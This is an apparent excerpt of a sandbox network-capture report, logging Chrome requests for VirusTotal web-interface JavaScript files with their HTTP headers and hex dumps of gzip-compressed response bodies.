                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC689OUTGET /gui/40384.0c04b76e636824f67499.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 489503aeaf6c20881f516248ee9d8c07
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Fri, 19 Apr 2024 14:10:52 GMT
                                                                                                                                                                                                                    Expires: Sat, 19 Apr 2025 14:10:52 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "4IXFzQ"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 539075
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1051INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 31 0d 0a 02 0d 0a 63 66 38 0d 0a ff ec 5a 6d 73 db 36 12 fe 7e bf 42 e6 dd 79 c8 2b 8e 95 1d c7 2f f2 b1 6e 9a c4 ad db e4 e2 89 9d ce b4 1e 0f 87 16 61 09 31 45 aa 00 28 55 27 eb bf df b3 00 f8 62 4b 76 9c d4 6d 33 37 e7 c9 c4 34 09 02 bb 8b dd 67 9f 5d d0 2b 15 ef 28 2d 45 5f 7b fb be e2 d9 65 38 e5 17 e3 a4 7f f5 7c 58 e6 57 13 1d 97 22 1e 25 22 8f ee 79 76 7d 7d 76 1e 84 e3 52 0d fd b3 b3 ad ee 93 dd ad 73 36 df 79 b2 f3 64 a3
                                                                                                                                                                                                                    Data Ascii: 00000001000000010000000100000001000000010000000100000001000000010000001cf8Zms6~By+/na1E(U'bKvm374g]+(-E_{e8|XW"%"yv}}vRs6yd
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: f6 69 ec 93 ed 4d cc 90 d2 00 4b 43 86 74 d7 30 0e 36 c6 e5 46 77 7b 0f 8c 64 82 4b c3 8d 5a 3c 04 36 23 1e 62 d2 6f 74 33 3f ec 43 6b 77 07 36 7c 33 cd 8f 65 31 e6 52 cf 4e 66 a3 8b 22 53 f6 2d 51 bd b5 72 0c 76 64 9f 68 8a 88 04 50 29 d3 5c fa 7e 45 2b 7c ac 7b 33 31 dd 9c e2 05 57 7d 29 c6 ba 90 46 c6 90 e7 a0 1e 32 b9 c8 90 ae 89 9f 98 80 0a 93 f1 38 9b f9 08 b5 60 e1 26 6b 11 97 98 3c 02 50 e2 93 7e 3c da d8 e7 ff aa 79 89 63 30 fb fc 8b 2f 2a fd 6d b2 af 47 80 04 b4 68 0c 37 34 86 ff 7d f3 60 e0 cc e2 cb 80 c1 53 08 ab 5e 26 e4 2a 6d cd 90 76 89 7f 62 0e e2 53 bd 95 86 6c 34 54 07 6e 40 ca 2f 45 ce 9d a5 05 07 49 62 1f 7a 15 62 04 bd 96 4c 77 08 b4 6a 81 99 11 f2 03 0b c0 b8 1c de 8d 7f ce c0 ba 09 39 a7 a5 73 05 17 93 3e 8f 3c 65 7c c4 43 c4 cc c6
                                                                                                                                                                                                                    Data Ascii: iMKCt06Fw{dKZ<6#bot3?Ckw6|3e1RNf"S-QrvdhP)\~E+|{31W})F28`&k<P~<yc0/*mGh74}`S^&*mvbSl4Tn@/EIbzbLwj9s><e|C
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC984INData Raw: 5a 77 33 23 b4 bb b9 49 ca 0f f6 65 48 9b e6 b7 7b 36 73 6c 02 4e 7a 90 e9 5c 01 43 47 01 f4 27 ac 19 c6 97 45 99 a7 55 77 55 47 cd 13 91 a2 02 c4 5e 2f 6f f5 31 95 02 38 8c 81 72 22 84 7a a6 40 b1 35 09 ca 25 9b 54 c3 ba 7a 50 76 9a 15 2e 13 39 5f e7 d6 d7 75 a1 93 ec 65 3e 40 99 af 2c 38 43 c3 d3 d6 4d 9f df 4a 28 d4 72 52 d8 a9 d6 18 c4 86 ab 52 56 4e d1 3c be 6b 32 52 b7 da e5 17 48 42 f5 34 cb fd e4 db e2 c0 a6 e8 c6 3a cf c9 0b 2d 2e 67 3e b5 07 ac 87 dc 65 47 6a 9c 49 4d 36 05 cc 61 3c f5 13 80 b9 e3 fa 8e 09 25 bd 5f 39 8e 8e ee dd 96 36 3a a2 6f 40 7d b9 d6 5c 8b 55 4e 63 ea dc df 7e 84 85 70 1c 87 93 e7 a8 a1 a9 53 d8 44 e1 72 d1 4b 6e 65 e2 81 79 69 0d 33 31 da 60 1c 85 af 81 3f 2a 73 8d 5b 99 24 4d 4f 6c 0f df f4 c9 da a5 30 29 f4 b6 c2 de 7c
                                                                                                                                                                                                                    Data Ascii: Zw3#IeH{6slNz\CG'EUwUG^/o18r"z@5%TzPv.9_ue>@,8CMJ(rRRVN<k2RHB4:-.g>eGjIM6a<%_96:o@}\UNc~pSDrKneyi31`?*s[$MOl0)|
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    121192.168.2.164987274.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC689OUTGET /gui/58912.318758154ac26af8c8bf.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 67e92b5fc70b4fc85d9fafef13890df5
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:41:27 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:41:27 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 36840
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 66 66 62 0d 0a 00 00 00 02 ff ec 7d 79 73 db 48 92 ef ff fb 29 60 b8 db 4d 74 83 10 0f 89 07 68 5a a3 96 e5 59 ef ca 47 58 ea de 98 d1 2a 64 90 00 49 b4 41 80 0b 80 3a 4c f3 bb bf 5f 66 55 01 05 52 b4 dc 3d 7e f1 e2 6d c8 b4 48 b0 ce ac ac ac ac bc aa 68 2e b3 c0 c8 f2 34 1c e7 e6 a0 96 05 d1 c4 b9 09 46 0b 6f fc e9 78 b6 8c 3f 5d e7 57 cb f0 6a ee 85 f1 f0 2b 79 5f be 5c 5c 5a ce 62 99 cd 6a 17 17 07 bd 7e b3 65 37 bb bd fd ee a5 bd 6a f7 9a 9d be 5b cb ed c0 4e ac e1 8b 55 e2 f8 b5 c0 5e fd 87 5b c3 b7 68 6d 0d ae bd d4 48 ed d0 ce 86 49 ad 8b ba 7d cb f6 e8
                                                                                                                                                                                                                    Data Ascii: 00000001000000010000000100000001000000010ffb}ysH)`MthZYGX*dIA:L_fUR=~mHh.4Fox?]Wj+y_\\Zbj~e7j[NU^[hmHI}
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: ed 06 01 31 99 34 1a ad 3e 77 d3 ed 06 23 e0 c0 7c da e9 78 9d 26 37 de ef ed 07 1e f0 67 3e 6d 34 fc 96 7f 40 4f 93 49 17 75 e8 c9 9b f4 7c f1 d4 9d f4 1a 63 9f d2 46 ed a0 2f d2 c6 fb ad a0 23 ca 75 0e 3a 2d 6e 79 d2 ed 35 c5 a0 7a be df 1e 77 b9 46 30 f2 7c 1e fc 64 d4 6b 74 81 5c f3 69 af 31 6a fa dc ef c4 1f ed 77 38 6d 32 1e fb 01 43 30 1a 23 9f 7b 9b 4c 02 bf c3 03 1d 03 50 31 e4 f1 a4 37 16 10 34 47 fd a0 cb 7d f8 c0 56 83 5b 09 ba ad 7e 8f 7b 0b 3a de 48 a4 79 9d 6e a7 c9 ed 35 1a fd ae 68 05 e3 6d 74 b8 6e 83 ff 55 50 c8 b4 74 fe 8e 67 94 90 d8 69 75 3a a2 70 af d5 7b 75 d4 a1 21 fc fa f2 65 e7 e4 57 1e cc c1 d1 c1 31 23 62 ff d7 83 ce 2b ce a5 b9 3f 3a 32 2f d7 76 38 4c ad 41 5c bb a8 35 6c cf 59 c8 7d d0 aa ad 88 39 b8 67 d8 fe e3 e9 da ba b4
                                                                                                                                                                                                                    Data Ascii: 14>w#|x&7g>m4@OIu|cF/#u:-ny5zwF0|dkt\i1jw8m2C0#{LP174G}V[~{:Hyn5hmtnUPtgiu:p{u!eW1#b+?:2/v8LA\5lY}9g
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 55 58 ae 12 48 35 59 52 9f 96 1b 8c eb 46 4e 8b e0 f5 3b 78 06 21 9b 39 86 c2 75 08 fe a7 21 53 ce 3f 12 a5 f4 25 70 3f fe e6 ad 54 87 ea 13 a0 fa c4 50 2d 5e 9c 43 96 30 30 30 5a dd 46 98 c5 3f c1 e2 88 a5 3e 0f 3f 07 3e 31 28 43 c8 04 86 1f 5c 87 e3 20 7b be b7 20 e4 e8 03 ff d6 cd fc d0 34 f5 55 71 05 20 ae 18 08 6d 4f a5 f1 81 b0 ca 4d 0b 5d 59 6b de 39 e5 6e 01 71 6a 95 43 f8 49 16 64 6a f5 a6 cc 23 6b 12 3d 10 23 17 24 6d 32 75 b2 e9 f3 58 e8 ab 44 ad 90 5d 69 c3 a9 73 6b 30 b9 e9 56 3c 29 78 97 e8 25 d1 5b ec 77 34 11 42 e2 92 c8 26 a6 21 b7 c2 62 36 d0 da d6 54 90 09 57 99 c3 9e 3d 0b 54 01 51 bd cc 3a 8c 61 d4 0c ae 53 68 29 c9 4d 4c b9 6e a4 52 7e 5b d0 f7 f5 e6 c6 0c 69 58 ec af a5 02 a3 a0 7d 08 03 5e ea 43 f4 61 e9 00 4a 7b 3c 0d 60 13 59 8d
                                                                                                                                                                                                                    Data Ascii: UXH5YRFN;x!9u!S?%p?TP-^C000ZF?>?>1(C\ { 4Uq mOM]Yk9nqjCIdj#k=#$m2uXD]isk0V<)x%[w4B&!b6TW=TQ:aSh)MLnR~[iX}^CaJ{<`Y
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC296INData Raw: b5 fd ce 3e b7 8f ed 33 fb c4 3e b2 5f db ef 85 c4 a3 02 e3 8c 3f 44 b8 18 f9 d9 13 15 73 f7 29 b8 83 d7 cf a2 28 31 19 9f 06 97 99 16 85 77 76 37 1f 25 51 26 e2 97 76 44 ea c9 32 d4 4c 00 fb 42 3a 4c 0b 47 94 ea 1b 0c 4b d9 38 ee ed 46 89 bd 70 f7 52 48 9b 13 c4 08 1a 4c 49 13 87 75 81 78 1d 85 2d c2 12 bb 88 ee 10 f2 95 d2 3e cd b1 75 c9 5a f5 60 bc 21 33 81 0a e0 0b 86 cd 41 f0 bc 70 17 cb 60 be 41 f0 cb 2f 62 24 09 c7 b4 3d 29 a3 13 2f 82 cb c3 a2 38 be b8 ab f5 20 f8 b1 75 f8 87 44 4b 2d 81 87 aa 61 39 e8 e0 c4 43 b8 5c 4d f5 4b 23 7b 49 40 db 09 aa 51 d4 97 fb c0 08 b3 43 59 a0 12 09 18 92 f7 d5 7e a8 2a c0 b0 5c 0d a6 1d 00 dd d7 01 1c 8c 00 f2 81 0e 80 dc 00 fb 24 fe 2b 8b 54 89 60 39 4a 49 0a 32 ba 11 b2 82 99 31 8d 14 71 97 20 80 02 39 1c 9f a8
                                                                                                                                                                                                                    Data Ascii: >3>_?Ds)(1wv7%Q&vD2LB:LGK8FpRHLIux->uZ`!3Ap`A/b$=)/8 uDK-a9C\MK#{I@QCY~*\$+T`9JI21q 9
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 31 0d 0a 30 30 30 30 30 30 30 31 0d 0a 71 0d 0a 30 30 30 30 30 30 30 31 0d 0a e0 0d 0a 30 30 30 30 30 30 30 31 0d 0a 74 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8e 0d 0a 30 30 30 30 30 30 30 31 0d 0a 68 0d 0a 30 30 30 30 30 30 30 31 0d 0a 48 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5f 0d 0a 30 30 30 30 30 30 30 31 0d 0a be 0d 0a 30 30 30 30 30 30 30 31 0d 0a c0 0d 0a 30 30 30 30 30 30 30 31 0d 0a dd 0d 0a 30 30 30 30 30 30 30 31 0d 0a c8 0d 0a 30 30 30 30 30 30 30 31 0d 0a 36 0d 0a 30 30 30 30 30 30 30 31 0d 0a 21 0d 0a 30 30 30 30 30 30 30 31 0d 0a 78 0d 0a 30 30 30 30 30 30 30 31 0d 0a 97 0d 0a 30 30 30 30 30 30 30 31 0d 0a ef 0d 0a 30 30 30 30 31 0d 0a eb 0d 0a 30 66 65 64 0d 0a 2a 55 dd a4 83
                                                                                                                                                                                                                    Data Ascii: 0000000100000001100000001q0000000100000001t0000000100000001h00000001H00000001_0000000100000001000000010000000100000001600000001!00000001x0000000100000001000010fed*U
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 15 65 e4 e8 57 79 22 f2 e4 fd c7 af 1b 1a b5 80 25 34 c0 67 6d c4 06 3a 4b 6e 78 5f bd cd df 40 74 15 1b 68 6e 4f a1 47 00 30 f2 e5 ab 7e 44 f4 09 fa e1 38 2b 11 cb c0 8f 68 8f f4 8e 7b 47 c7 02 00 d3 da 43 4e 5c 0c bd ae a3 be ce 78 b0 57 22 1c d1 5d d1 57 12 60 c0 07 e8 f1 b5 ef 06 6b dd 93 6d 97 0e 6e 5a f3 d3 20 86 70 c4 11 b6 e0 82 70 a6 93 88 0d 68 68 ff dd 5a 74 d9 bb 09 35 5d 25 0a 88 2c d9 72 3e 47 74 31 84 3f b1 5e b4 75 2a ab e0 28 16 17 29 0e 5a 91 19 07 48 5b 3a 6f 8f de 9c 5c bd 3c 39 3b be 7a 73 f4 fe fd eb b7 7f 97 56 54 ad 0d ee 53 b5 50 e1 1b 4a 68 c8 1d da 7d 70 ec 4e b1 9d e0 5f 6f 3c 50 8d 07 fa 36 0a cf cb 26 2b da 18 a2 52 1a 4b 8a 10 01 3d ef 3f aa 08 b8 d2 2d c4 76 41 22 11 c4 b3 95 f1 0b 06 a2 4f 11 d3 21 c3 32 eb a3 24 c5 76 05
                                                                                                                                                                                                                    Data Ascii: eWy"%4gm:Knx_@thnOG0~D8+h{GCN\xW"]W`kmnZ pphhZt5]%,r>Gt1?^u*()ZH[:o\<9;zsVTSPJh}pN_o<P6&+RK=?-vA"O!2$v
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 80 6b 7a f4 b5 b5 17 c9 ad 41 5d 9f f2 dd a0 af e3 3e 16 b2 a7 c1 88 97 d0 a5 2b f6 0d d9 e7 dd 72 04 c2 bd 82 c9 a6 5b 52 d4 06 a5 4f cd 86 59 1e 36 49 9a d7 bf 3c eb 1a a6 e0 c8 a5 4e 8f 60 5a d4 55 13 0d 33 0c ac b5 c7 3d ee a4 a4 7a 6b 6d 8b f3 0a da b0 a4 ab 56 9f 16 ee ec c1 2e 45 4b 3b fb f4 04 f5 a2 cf 35 6e 6d 90 f7 20 b8 ab e2 28 9e 8b c3 e5 8b 68 39 0d e3 cc 85 eb 0a cc c8 07 01 e3 cc 09 0e e8 21 0f a6 3a 71 ce cf 5d 91 13 9b 08 0b e5 38 84 97 cd c4 a0 6c 26 71 72 9b 54 29 ec 2b 64 25 67 ed 82 06 4b ae 28 78 e9 24 cb 73 0d f3 17 89 70 4d e1 bb a5 bb 64 0a d7 54 80 0b 99 d0 ad 89 25 08 f7 02 0e 28 dc 5b e7 0e 2a ec 2b f2 86 de 9f 7d 0d cf 1d fe d9 19 46 85 32 e0 3e 72 25 d3 d6 3a 4d c8 08 c6 e3 ca 5c 8e b6 73 26 b8 ec a7 96 41 ac 4b 61 9a d7 f0
                                                                                                                                                                                                                    Data Ascii: kzA]>+r[ROY6I<N`ZU3=zkmV.EK;5nm (h9!:q]8l&qrT)+d%gK(x$spMdT%([*+}F2>r%:M\s&AKa
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC105INData Raw: 32 8d 4e a3 55 2c 1c 8c 61 b3 40 a3 b1 bf df db 18 c9 66 99 5e 03 94 52 1d cf 66 91 8e df c4 c1 17 01 4b c4 97 4d 6c 96 d0 29 84 a8 7a 0b 12 bd 80 9a aa d1 b4 8e a8 0d 5c 11 45 53 39 f1 fd 89 5c 76 25 52 f4 12 41 83 5e 55 84 54 f2 c7 93 7e 10 88 7c 9e d0 4a e6 c1 a4 ad 56 a3 9a 52 3d 1f 4b b5 15 c8 f5 2c 27 0d 0a
                                                                                                                                                                                                                    Data Ascii: 2NU,a@f^RfKMl)z\ES9\v%RA^UT~|JVR=K,'
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a b5 0d 0a 30 30 30 30 30 30 30 31 0d 0a 92 0d 0a 30 30 30 30 30 30 30 31 0d 0a ed 0d 0a 30 30 30 30 30 30 30 31 0d 0a 05 0d 0a 30 30 30 30 30 30 30 31 0d 0a 4d 0d 0a 30 30 30 30 30 30 30 31 0d 0a d5 0d 0a 30 30 30 30 30 30 30 31 0d 0a b7 0d 0a 30 30 30 30 30 30 30 31 0d 0a 40 0d 0a 30 30 30 30 30 30 30 31 0d 0a 40 0d 0a 30 30 30 30 30 30 30 31 0d 0a 25 0d 0a 30 30 30 30 30 30 30 31 0d 0a 77 0d 0a 30 30 30 30 30 30 30 31 0d 0a 3c 0d 0a 30 30 30 30 30 30 30 31 0d 0a c1 0d 0a 30 30 30 30 30 30 30 31 0d 0a 4b 0d 0a 30 30 30 30 30 30 30 31 0d 0a f4 0d 0a 30 30 30 30 30 30 30 31 0d 0a cc 0d 0a 30 30 30 30 30 30 30 31 0d 0a 83 0d 0a 61 64 66 0d 0a d7 33 f5 05 58 0c 9c 8d 26 e5 e0 fb 3e 2e 84 55 43 53 17 1d ca a0 99 b2 d4 b8 45 af 0d
                                                                                                                                                                                                                    Data Ascii: 0000000100000001000000010000000100000001M000000010000000100000001@00000001@00000001%00000001w00000001<0000000100000001K000000010000000100000001adf3X&>.UCSE
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: cf 16 58 b4 62 16 56 d2 b1 4f d7 a0 6a e5 c4 c9 2d 5c c1 c6 bf ee 03 01 62 a5 50 a7 cd e3 06 52 99 fe eb d9 0d 9d 1e 53 c8 bc 17 08 3a b7 5b 5f 2e a2 c4 f3 15 14 44 98 05 4d de d3 95 24 19 d7 e5 ba e2 e6 97 24 fd 93 b5 2f c4 85 d9 97 85 3b 9c 06 60 3c 09 71 db 62 9a 7b 71 be d6 ad 5c 88 99 f8 c4 84 5d bf 25 69 40 ca 22 65 2a c9 00 07 dd 4e 21 a5 94 39 73 d8 b3 ba 9d de 3d 39 b4 05 f6 fb d8 c0 b6 5a 63 a1 00 a6 a2 fb b2 38 0f 32 ff 02 dc 1b a7 02 26 29 5d e8 84 d3 f3 09 ac 5f 59 46 b7 d9 40 38 c2 bd 66 41 b6 6a fc b8 2a 43 69 ea ca f3 51 bf 15 dc 58 af 4e 24 80 f5 22 f5 d5 55 9e e0 da 79 88 49 bc d2 f1 03 18 58 1f f8 51 07 52 81 e0 23 d0 7a 55 d5 10 ac 73 43 bd 95 95 38 30 a1 d6 b0 d6 07 48 56 7b 6b 73 50 16 60 6a d1 db 62 3f ea 0c 87 42 00 c6 14 b6 bd 95
                                                                                                                                                                                                                    Data Ascii: XbVOj-\bPRS:[_.DM$$/;`<qb{q\]%i@"e*N!9s=9Zc82&)]_YF@8fAj*CiQXN$"UyIXQR#zUsC80HV{ksP`jb?B


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    122192.168.2.164987374.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC689OUTGET /gui/67119.0f2e302c9bd4920403eb.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 7ddd076e8e7b2e2ac404121897f9be1e
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:37:49 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:37:49 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 37058
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a ac 0d 0a 30 30 30 30 30 30 30 31 0d 0a 7c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 7b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 9b 0d 0a 30 30 30 30 30 30 30 31 0d 0a db 0d 0a 30 30 30 30 66 66 31 0d 0a 36 ae f7 ff fb 29 54 6f 37 c7 de 23 69 74 97 a5 89 b3 27 9d a4 4d da 5c da dc 76 b7 3d 7d 5a 59 a6 6d 75 6c c9 95 e4 b9 64 32 df fd fc 00 52 b2 3c 63 39
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001|00000001{00000001000000010000ff16)To7#it'M\v=}ZYmuld2R<c9
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: ef c4 7a b3 82 6a aa c9 cd ed 6d 55 27 75 96 6a 68 06 cc 66 d7 2b 51 a1 14 59 87 a1 a5 e7 e6 36 af 92 b9 38 7b fb 76 34 9c 99 3f 8f 6e b7 9b 19 72 ce 86 85 6c 6c 28 e0 74 58 98 cb a4 1a 0e 94 08 03 a8 aa 2b 12 14 d7 fd ec 16 2e a5 42 d1 6f a5 f4 cf 51 d9 3d e2 d1 48 df 67 2e 2a 62 4f bd e8 ab c9 64 58 4e ba 9c 45 85 a4 8b 22 9b 69 16 12 cb 07 0f 4a d5 9c d4 76 5d c2 3d 11 54 8f 1c 8a bb bc 3e 7d 92 bc d0 5d c5 a7 4f c2 44 37 79 9a a4 cb e1 10 23 80 b9 dd 91 bb 18 e1 cf 6d 89 16 44 0b ed e9 70 59 af 57 a3 e1 ea d3 a7 e1 6a b2 fe 5d fb fa c6 ba fd 7d bf d9 5a 89 fe c1 4a 97 19 a6 c8 30 45 86 87 b3 ec 42 e3 1e 32 19 2c d1 5c e9 b9 96 51 af 30 ca e2 72 f0 88 d9 69 0f 4f 40 f4 08 5c 55 7f 3b 17 d7 d5 e1 3a 8f cc 75 b2 19 a2 16 7a 89 f9 a2 53 dc 73 14 f7 fc 4e
                                                                                                                                                                                                                    Data Ascii: zjmU'ujhf+QY68{v4?nrll(tX+.BoQ=Hg.*bOdXNE"iJv]=T>}]OD7y#mDpYWj]}ZJ0EB2,\Q0riO@\U;:uzSsN
